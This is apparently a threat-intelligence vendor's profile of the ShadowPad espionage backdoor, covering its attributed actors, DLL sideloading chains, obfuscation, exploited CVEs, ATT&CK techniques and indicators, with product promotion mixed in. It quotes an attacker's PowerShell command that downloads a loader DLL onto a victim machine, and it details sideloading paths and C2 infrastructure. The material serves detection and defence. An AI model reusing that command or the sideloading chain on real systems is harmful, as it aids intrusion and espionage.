ShadowPad
ShadowPad is a privately developed, actively maintained modular remote access toolkit/backdoor widely associated with China-aligned espionage activity. The content states it first emerged around 2015 and has been used by numerous distinct threat actors, including groups and clusters such as RedFoxtrot, Tonto Team, FishMonger, Earth Lusca, FamousSparrow, and activity linked with Winnti-related operations. It has also been described as POISONPLUG.SHADOW, with Kaspersky credited in the content for introducing the ShadowPad family name.
Its observed role is long-term post-compromise access and espionage. Reported capabilities and behaviors in the content include collecting the victim system username, communicating over HTTP to retrieve and decode a command-and-control URL, and operating as a modular framework delivered through loaders and sideloading chains. ShadowPad is repeatedly described as being deployed after initial compromise to maintain persistence and support follow-on intrusion activity.
The content highlights extensive use of DLL sideloading and loader-based execution. Reported examples include side-loading via legitimate Bitdefender Crash Handler BDReinit.exe with log.dll and log.dll.dat; use of a renamed Microsoft Office IME executable to sideload imjpp14.dll before injecting the decrypted payload into wmplayer.exe; and deployment through older Bitdefender binaries where the loader copied itself to C:\ProgramData\OfficeDriver\svchost.exe, installed as a service, spawned wmplayer.exe and dllhost.exe, encrypted payload data into the registry, and later executed shellcode from RWX memory. Additional reporting in the content describes ShadowPad-related sideloading through legitimate software from security vendors and use in repeated DLL search order hijacking campaigns.
The malware is also notable for advanced protection and evasion. POISONPLUG.SHADOW/ShadowPad is described as protected by the custom ScatterBrain obfuscating compiler, which uses multiple protection modes, control-flow obfuscation, instruction mutation, and complete import protection to hinder static and dynamic analysis. The content also notes variants and loaders that inject into legitimate processes and store encrypted payloads in the registry.
ShadowPad has been observed across a broad set of espionage campaigns and sectors. Reported targeting includes government entities, foreign affairs ministries, telecommunications providers, NGOs, think tanks, Catholic organizations, research institutes, and a financial-sector trade group, with victims spanning Asia, Central Asia, Southeast Asia, the United States, Mexico, Honduras, Pakistan, Taiwan, Thailand, Hungary, Turkey, France, and Afghanistan. In the content, it is repeatedly tied to Chinese state-aligned or contractor-linked operations, including references to I-SOON/FishMonger and Chengdu404-related activity.
The content also links ShadowPad to additional malware ecosystems and delivery chains. It is listed alongside tools such as PlugX, Spyder, SodaMaster, FunnySwitch, BIOPASS RAT, SprySOCKS, Cobalt Strike, and Linux Winnti. Cisco Talos reporting in the content states that the DKnife adversary-in-the-middle framework delivered ShadowPad and DarkNimbus by hijacking Windows binary downloads and Android application updates. Orange Cyberdefense CERT reporting cited in the content says ShadowPad and PlugX were used to distribute NailaoLocker in exploitation tied to CVE-2024-24919.
High-confidence indicators and artifacts directly mentioned in the content include C2 or infrastructure references such as api.googleauthenticatoronline[.]com resolving to 213.59.118[.]124, 216.238.106[.]150, and registry storage under HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID{1845df8d-241a-a0e4-02ea341a79878897}\D752E7A8. Related file and path artifacts include log.dll, log.dll.dat, BDReinit.exe, imjpp14.dll, C:\ProgramData\OfficeDriver\svchost.exe, and wmplayer.exe. The content also notes ShadowPad samples delivered by DKnife were signed with certificates issued to 四川奇雨网络科技有限公司 in Chengdu, Sichuan, China.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
19 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
In May 2024, CVE-2024-24919, an information disclosure vulnerability in Check Point Quantum Security Gateways was exploited in the wild and tied to NailaoLocker ransomware (distributed via ShadowPad and PlugX backdoors, as documented by Orange Cyberdefense CERT).
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
ShadowPad is a modular remote access Trojan (RAT) that is closely associated with China-based APT groups. Because of its modular nature, ShadowPad can be continuously updated with new functionalities.
Among our finds on the server were utilities for lateral movement... The server had the following utilities: Utilities to check for and exploit vulnerability MS17-010... The hackers tweaked the functionality of the MS17-010 utility by adding the ability to check an entire subnet.
In their latest campaign, the actor leverages one of the latest WinRAR vulnerabilities that will ultimately lead to running shellcode... Rule names: EE_Loader EE_Dropper WinRAR_ADS_Traversal References / Resources: WinRAR CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-8088
The malware payloads seen in campaigns investigated by Microsoft Defender vary from remote access trojans (RATs) like VShell and EtherRAT, the SNOWLIGHT memory-based malware downloader that enabled attackers to deploy more payloads to target environments, ShadowPAD, and XMRig cryptominers. | CVE-2025-55182 (also referred to as React2Shell and includes CVE-2025-66478, which was merged into it) is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components, Next.js, and related frameworks.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a flaw in TrueConf Client, tracked as CVE-2026-3502 (CVSS score of 7.8), to its Known Exploited Vulnerabilities (KEV) catalog. CVE-2026-3502 is a flaw in TrueConf Client that allows it to download and install updates without verifying them. Attackers who can tamper with the update source can deliver malicious files, leading to arbitrary code execution on the system.
NetSarang Xmanager Enterprise 5.0 Build 1232, Xmanager 5.0 Build 1045, Xshell 5.0 Build 1322, Xftp 5.0 Build 1218, and Xlpd 5.0 Build 1220 contain a malicious nssock2.dll that implements a multi-stage, DNS-based backdoor. | References include https://securelist.com/shadowpad-in-corporate-networks/81432/ and a Kaspersky press release about 'ShadowPad attackers' hiding a backdoor in software used by hundreds of large companies worldwide. The description states the malicious nssock2.dll implements a multi-stage, DNS-based backdoor.
They also took advantage of specific software weaknesses, such as CVE-2024-8963 and CVE-2024-8190, sometimes even exploiting them before these vulnerabilities were publicly disclosed. | A key piece of malicious software was ShadowPad, described as a “closed-source modular backdoor platform” often used by these Chinese-linked groups to spy and gain remote access.
They also took advantage of specific software weaknesses, such as CVE-2024-8963 and CVE-2024-8190, sometimes even exploiting them before these vulnerabilities were publicly disclosed. | A key piece of malicious software was ShadowPad, described as a “closed-source modular backdoor platform” often used by these Chinese-linked groups to spy and gain remote access.
“We also discovered that APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation.” / “During the compromise the threat actor attempts to exploit CVE-2018-0824, with a tool called UnmarshalPwn …”
...эксплуатации цепочки уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
...эксплуатации цепочки уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
...источником их заражения оказался почтовый сервер Exchange, который оказался скомпрометированным еще летом 2024 года с помощью эксплуатации цепочки уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
...ShadowPad Malware Actively Exploits WSUS Vulnerability... exploiting CVE-2025-59287 for initial access...
...exploited a public-facing Citrix NetScaler Gateway appliance, likely CVE-2023-3519, for initial access and deployed SnappyBee (also known as Deed RAT)... CVE-2023-3519 is a critical remote code execution (RCE) vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway appliances.
Groups observed using it
31 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The privately developed ShadowPad backdoor was sold to multiple suspected PLA units, including RedFoxtrot and Tonto Team, and shared with entities like Chengdu404, whose staff were charged for activity attributed to APT41.
The privately developed ShadowPad backdoor was sold to multiple suspected PLA units, including RedFoxtrot and Tonto Team, and shared with entities like Chengdu404, whose staff were charged for activity attributed to APT41.
Their toolkit includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, and the BIOPASS RAT, and expanding SprySOCKS to Windows clearly shows continued investment in offensive capability.
Operators used implants – such as ShadowPad, SodaMaster, and Spyder – that are common or exclusive to China-aligned threat actors.
This campaign is also the first documented time FamousSparrow used ShadowPad, a privately sold backdoor... The final payloads were SparrowDoor and ShadowPad.
This includes an unreported cluster dubbed SteppeDriver that was first discovered in 2024 and has since targeted entities in France, Mongolia, and South America using tools like ShadowPad, COOLCLIENT, CurlyDoor, RudeGull, and MKTDownloader.
Techniques & procedures
37 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
5 techniques
Resource Development
These private players supply everything from malware and network infrastructure to raw stolen data, turning cyber espionage into a marketplace.
Initial Access
2 techniques
Initial Access
Execution
7 techniques
Execution
Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.
ESET's experts found that the China-aligned cyberespionage outfit has hit its targets with two previously undocumented versions of their flagship backdoor called SparrowDoor. Importantly, the group was also observed using the ShadowPad backdoor for the first time.
At Victim D, the loader was downloaded using the following PowerShell command: powershell (new-object System.Net.WebClient).DownloadFile("http://<victim’s_web_server_IP_address>/Images/menu/log.dll";"c:\users\public\log.dll")
At Victim D, the attackers gained access to an admin console and used it to deploy implants on other machines in the local network.
This functionality is achieved by utilizing the Windows native functions NtAllocateVirtualMemory and NtCreateThreadEx... The sample will allocate an RWX-protected memory region using the VirtualAlloc Windows API, then write the shellcode to the memory region and pass execution to it.
Persistence
3 techniques
Persistence
Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.
Privilege Escalation
4 techniques
Privilege Escalation
Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.
Another command, ID 0x43, is particularly noteworthy as it allows the attacker to execute shellcode in the memory of the same process... using NtAllocateVirtualMemory and NtCreateThreadEx... Once log.dll is loaded, it will spawn Microsoft Windows Media Player (wmplayer.exe) and dllhost.exe, injecting into them.
Stealth
11 techniques
Stealth
DOORME XOR-encrypts strings to evade detection... The malware employs a technique that can cause disassemblers to incorrectly split functions... The malware in question also employs a technique known as Control Flow Obfuscation... Dynamic import table resolution... log.dll incorporates a code-scattering obfuscation technique to frustrate static analysis.
ScatterBrain is a sophisticated obfuscating compiler that integrates multiple operational modes and protection components to significantly complicate the analysis of the binaries it generates.
Complete Import Protection: ScatterBrain employs a complete protection of a binary's import table, making it extremely difficult to understand how the binary interacts with the underlying operating system.
DOORME first resolves the address of LoadLibraryA and GetProcAddress Windows API by parsing the kernel32.dll module export table... The sample uses the common Ldr crawling technique to find the address of kernel32.dll... It uses GetProcAddress to resolve imports as needed.
Selective or Full Control Flow Graph (CFG) Obfuscation: This technique restructures the program's control flow, making it very difficult to analyze and create detection rules for.
Another command, ID 0x43, is particularly noteworthy as it allows the attacker to execute shellcode in the memory of the same process... using NtAllocateVirtualMemory and NtCreateThreadEx... Once log.dll is loaded, it will spawn Microsoft Windows Media Player (wmplayer.exe) and dllhost.exe, injecting into them.
Finally, the decrypted payload is injected into a wmplayer.exe process (Windows Media Player).
The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.
The REF2924 intrusion set, using SIESTAGRAPH, DOORME, SHADOWPAD, and the system binary proxy execution technique (among others) represents an attack group...
Defense Impairment
1 technique
Defense Impairment
Credential Access
1 technique
Credential Access
Discovery
6 techniques
Discovery
ShadowPad is capable of gathering host information, executing commands, interacting with the file system and registry, and deploying new modules.
The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
Lateral Movement
2 techniques
Lateral Movement
Collection
1 technique
Collection
Command and Control
4 techniques
Command and Control
Hunting C2/Adversaries Infrastructure with Shodan and Censys ... My research Cobalt Strike C2 Metasploit/MSF Covenant C2 Deimos C2 Posh C2 Brute Ratel C4 Mythic C2 Sliver C2 ... Night Hawk C2 NimPlant C2 ShadowPad C2 Infrastructure Async Rat C2 Infrastructure Meterpreter C2 Infrastructure
IOCs tracked for this family
189 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
190 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A privately developed backdoor commercialized and sold to multiple Chinese-linked entities and suspected PLA units for cyber espionage operations.
Named as part of FishMonger’s toolkit.
FishMonger’s toolset includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and the BIOPASS RAT.
A backdoor referenced as part of malware distribution associated with ransomware activity.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.